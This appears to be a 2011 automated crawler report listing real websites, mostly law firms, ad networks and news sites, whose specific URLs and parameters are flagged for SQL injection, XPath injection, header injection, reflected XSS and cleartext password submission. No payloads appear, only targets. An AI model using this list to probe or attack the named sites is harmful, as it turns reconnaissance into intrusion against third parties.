SQL Injection, Cross Site Scripting, HTTP Header Injection

DORK Crawler Report for January 24, 2011

Report generated by CloudScan Vulnerability Crawler at Wed Jan 26 08:00:28 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://lt.navegg.com/g.lt [ltcid cookie]

1.2. http://navegg.boo-box.com/sc.lt [id parameter]

1.3. http://v6test.cdn.att.net/image/special2.jpg [User-Agent HTTP header]

1.4. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]

1.5. http://www.fulbright.com/index.cfm [FUSEACTION parameter]

1.6. http://www.fulbright.com/index.cfm [article_id parameter]

1.7. http://www.fulbright.com/index.cfm [emp_id parameter]

1.8. http://www.fulbright.com/index.cfm [eventID parameter]

1.9. http://www.fulbright.com/index.cfm [fuseaction parameter]

1.10. http://www.fulbright.com/index.cfm [site_id parameter]

2. XPath injection

2.1. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 1]

2.2. http://www.hoganlovells.com/FCWSite/Img [REST URL parameter 2]

3. HTTP header injection

3.1. http://accuserve.homestead.com/files/a_ripple.swf [REST URL parameter 2]

3.2. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

3.3. http://livingsocial.com/deals/socialads_reflector [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.2. http://ads.roiserver.com/tag.jsp [h parameter]

4.3. http://ads.roiserver.com/tag.jsp [pid parameter]

4.4. http://ads.roiserver.com/tag.jsp [w parameter]

4.5. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.6. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.7. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.8. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.9. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.10. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.11. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.12. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

4.13. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

4.15. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

4.16. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

4.17. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

4.18. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

4.19. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

4.20. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

4.21. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

4.22. http://dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]

4.23. http://dcregistry.com/cgi-bin/surveys/survey.cgi [db parameter]

4.24. http://dcregistry.com/cgi-bin/surveys/survey.cgi [language parameter]

4.25. http://dcregistry.com/cgi-bin/surveys/survey.cgi [website parameter]

4.26. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json [callback parameter]

4.27. http://ds.addthis.com/red/psi/sites/www.wileyrein.com/p.json [callback parameter]

4.28. http://financaspessoais.blog.br/ [name of an arbitrarily supplied request parameter]

4.29. http://financaspessoais.blog.br/ [utm_campaign parameter]

4.30. http://financaspessoais.blog.br/ [utm_content parameter]

4.31. http://financaspessoais.blog.br/ [utm_medium parameter]

4.32. http://financaspessoais.blog.br/ [utm_source parameter]

4.33. http://financaspessoais.blog.br/ [utm_term parameter]

4.34. http://flowplayer.org/tools/ [REST URL parameter 1]

4.35. http://flowplayer.org/tools/expose.html [REST URL parameter 1]

4.36. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

4.37. http://js.revsci.net/gateway/gw.js [csid parameter]

4.38. http://landesm.gfi.com/event-log-analysis-sm/ [REST URL parameter 1]

4.39. http://rafael.adm.br/ [name of an arbitrarily supplied request parameter]

4.40. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]

4.41. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]

4.42. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

4.43. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

4.44. http://twittercounter.com/embed/ [username parameter]

4.45. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.46. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.47. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.48. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.49. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.50. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.51. http://web2.domainmall.com/domainserve/domainView [dn parameter]

4.52. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]

4.53. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]

4.54. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.55. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.56. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

4.57. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]

4.58. http://www.arnoldporter.com/practices.cfm [u parameter]

4.59. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]

4.60. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]

4.61. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]

4.62. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]

4.63. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]

4.64. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]

4.65. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]

4.66. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]

4.67. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]

4.68. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]

4.69. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]

4.70. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]

4.71. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]

4.72. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]

4.73. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

4.74. http://www.cov.com/news/detail.aspx [news parameter]

4.75. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]

4.76. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]

4.77. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]

4.78. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]

4.79. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]

4.80. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]

4.81. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]

4.82. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]

4.83. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]

4.84. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]

4.85. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]

4.86. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 1]

4.87. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 2]

4.88. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 3]

4.89. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 4]

4.90. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 5]

4.91. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 1]

4.92. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 2]

4.93. http://www.dcregistry.com/cgi-bin/classifieds/classifieds.cgi [db parameter]

4.94. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

4.95. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

4.96. http://www.fulbright.com/index.cfm [eTitle parameter]

4.97. http://www.fulbright.com/index.cfm [eTitle parameter]

4.98. http://www.fulbright.com/index.cfm [fuseaction parameter]

4.99. http://www.fulbright.com/index.cfm [fuseaction parameter]

4.100. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]

4.101. http://www.fulbright.com/index.cfm [pf parameter]

4.102. http://www.fulbright.com/index.cfm [rss parameter]

4.103. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]

4.104. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

4.105. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]

4.106. http://www.local.com/results.aspx [CID parameter]

4.107. http://www.local.com/results.aspx [CID parameter]

4.108. http://www.local.com/results.aspx [name of an arbitrarily supplied request parameter]

4.109. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]

4.110. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]

4.111. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]

4.112. http://www.usdirectory.com/gypr.aspx [cc parameter]

4.113. http://www.usdirectory.com/gypr.aspx [cr parameter]

4.114. http://www.vault.com/wps/portal/usa/rankings/individual [REST URL parameter 4]

4.115. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]

4.116. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]

4.117. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]

4.118. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]

4.119. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]

4.120. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]

4.121. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]

4.122. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]

4.123. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]

4.124. http://www.vault.com/wps/portal/usa/rankings/individual [regionId parameter]

4.125. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

4.126. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

4.127. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]

4.128. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]

4.129. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]

4.130. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]

4.131. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]

4.132. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]

4.133. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]

4.134. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]

4.135. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]

4.136. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]

4.137. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]

4.138. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]

4.139. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]

4.140. http://www.wileyrein.com/css/main.css [REST URL parameter 1]

4.141. http://www.wileyrein.com/css/main.css [REST URL parameter 2]

4.142. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]

4.143. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]

4.144. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]

4.145. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]

4.146. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]

4.147. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]

4.148. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]

4.149. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]

4.150. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]

4.151. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]

4.152. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]

4.153. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]

4.154. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]

4.155. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]

4.156. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]

4.157. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]

4.158. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]

4.159. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]

4.160. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]

4.161. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]

4.162. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]

4.163. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]

4.164. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]

4.165. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]

4.166. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]

4.167. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]

4.168. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]

4.169. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]

4.170. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]

4.171. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]

4.172. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]

4.173. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]

4.174. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]

4.175. http://www.wileyrein.com/index.cfm [REST URL parameter 1]

4.176. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]

4.177. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]

4.178. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]

4.179. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]

4.180. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]

4.181. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]

4.182. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]

4.183. http://www.wileyrein.com/js/script.js [REST URL parameter 1]

4.184. http://www.wileyrein.com/js/script.js [REST URL parameter 2]

4.185. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]

4.186. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]

4.187. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]

4.188. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]

4.189. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]

4.190. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]

4.191. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]

4.192. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]

4.193. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]

4.194. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]

4.195. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]

4.196. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]

4.197. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]

4.198. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]

4.199. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]

4.200. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]

4.201. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]

4.202. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]

4.203. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]

4.204. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]

4.205. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]

4.206. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]

4.207. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]

4.208. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]

4.209. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]

4.210. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]

4.211. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 1]

4.212. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 2]

4.213. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 3]

4.214. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 4]

4.215. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 1]

4.216. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 2]

4.217. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 3]

4.218. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 4]

4.219. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 1]

4.220. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 2]

4.221. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 3]

4.222. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 4]

4.223. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 1]

4.224. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 2]

4.225. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 3]

4.226. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 4]

4.227. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 1]

4.228. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 2]

4.229. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 3]

4.230. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 4]

4.231. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 1]

4.232. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 2]

4.233. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 3]

4.234. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 4]

4.235. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 1]

4.236. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 2]

4.237. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 3]

4.238. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 4]

4.239. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 1]

4.240. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 2]

4.241. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 3]

4.242. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 4]

4.243. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 1]

4.244. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 2]

4.245. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 3]

4.246. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 4]

4.247. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 1]

4.248. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 2]

4.249. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 3]

4.250. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 4]

4.251. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 1]

4.252. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 2]

4.253. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 3]

4.254. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 4]

4.255. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 1]

4.256. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 2]

4.257. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 3]

4.258. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 4]

4.259. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 1]

4.260. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 2]

4.261. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 3]

4.262. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 4]

4.263. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 1]

4.264. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 2]

4.265. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 3]

4.266. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 4]

4.267. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 1]

4.268. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 2]

4.269. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 3]

4.270. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 4]

4.271. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 1]

4.272. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 2]

4.273. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 3]

4.274. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 4]

4.275. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 1]

4.276. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 2]

4.277. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 3]

4.278. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 4]

4.279. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 1]

4.280. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 2]

4.281. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 3]

4.282. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 4]

4.283. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 1]

4.284. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 2]

4.285. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 3]

4.286. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 4]

4.287. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 1]

4.288. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 2]

4.289. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 3]

4.290. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 4]

4.291. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 1]

4.292. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 2]

4.293. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 3]

4.294. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 4]

4.295. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 1]

4.296. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 2]

4.297. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 3]

4.298. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 4]

4.299. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 1]

4.300. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 2]

4.301. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 3]

4.302. http://www.wileyrein.com/x22 [REST URL parameter 1]

4.303. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]

4.304. http://www.yellowpages.com/Washington-DC/Attorneys [REST URL parameter 1]

4.305. http://gc.blog.br/ [Referer HTTP header]

4.306. http://gc.blog.br/ [Referer HTTP header]

4.307. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

4.308. http://web2.domainmall.com/domainserve/domainView [Referer HTTP header]

4.309. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.310. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.311. http://www.arnoldporter.com/ [Referer HTTP header]

4.312. http://www.arnoldporter.com/about_the_firm_diversity_our_values.cfm [Referer HTTP header]

4.313. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm [Referer HTTP header]

4.314. http://www.arnoldporter.com/about_the_firm_recognition.cfm [Referer HTTP header]

4.315. http://www.arnoldporter.com/about_the_firm_recognition_rankings.cfm [Referer HTTP header]

4.316. http://www.arnoldporter.com/about_the_firm_who_we_are.cfm [Referer HTTP header]

4.317. http://www.arnoldporter.com/advisory.cfm [Referer HTTP header]

4.318. http://www.arnoldporter.com/careers.cfm [Referer HTTP header]

4.319. http://www.arnoldporter.com/contact.cfm [Referer HTTP header]

4.320. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

4.321. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

4.322. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

4.323. http://www.arnoldporter.com/global_reach.cfm [Referer HTTP header]

4.324. http://www.arnoldporter.com/globals_disclaimer.cfm [Referer HTTP header]

4.325. http://www.arnoldporter.com/globals_llp_status.cfm [Referer HTTP header]

4.326. http://www.arnoldporter.com/globals_non_discrimination.cfm [Referer HTTP header]

4.327. http://www.arnoldporter.com/globals_operating_status.cfm [Referer HTTP header]

4.328. http://www.arnoldporter.com/globals_privacy_policy.cfm [Referer HTTP header]

4.329. http://www.arnoldporter.com/globals_statement_clients_rights.cfm [Referer HTTP header]

4.330. http://www.arnoldporter.com/home.cfm [Referer HTTP header]

4.331. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

4.332. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

4.333. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

4.334. http://www.arnoldporter.com/news.cfm [Referer HTTP header]

4.335. http://www.arnoldporter.com/offices.cfm [Referer HTTP header]

4.336. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

4.337. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

4.338. http://www.arnoldporter.com/professionals.cfm [Referer HTTP header]

4.339. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

4.340. http://www.arnoldporter.com/remote_access.cfm [Referer HTTP header]

4.341. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

4.342. http://www.arnoldporter.com/sitemap.cfm [Referer HTTP header]

4.343. http://www.fulbright.com/index.cfm [Referer HTTP header]

4.344. http://www.kasimer-ittig.com/ [Referer HTTP header]

4.345. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

4.346. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

4.347. http://lt.navegg.com/g.lt [ltcid cookie]

5. Cleartext submission of password

5.1. http://dcregistry.com/wbn/welcome.html

5.2. http://dcregistry.com/wbn/welcome.html

5.3. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

5.4. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

5.5. http://money.cnn.com/magazines/fortune/bestcompanies/2010/snapshots/65.html

5.6. http://www.fulbright.com/

5.7. http://www.fulbright.com/index.cfm

5.8. http://www.fulbright.com/insite

5.9. http://www.fulbright.com/insite

5.10. http://www.local.com/results.aspx

5.11. http://www.political.cov.com/

5.12. http://www.skadden.com/alumni/Index.cfm

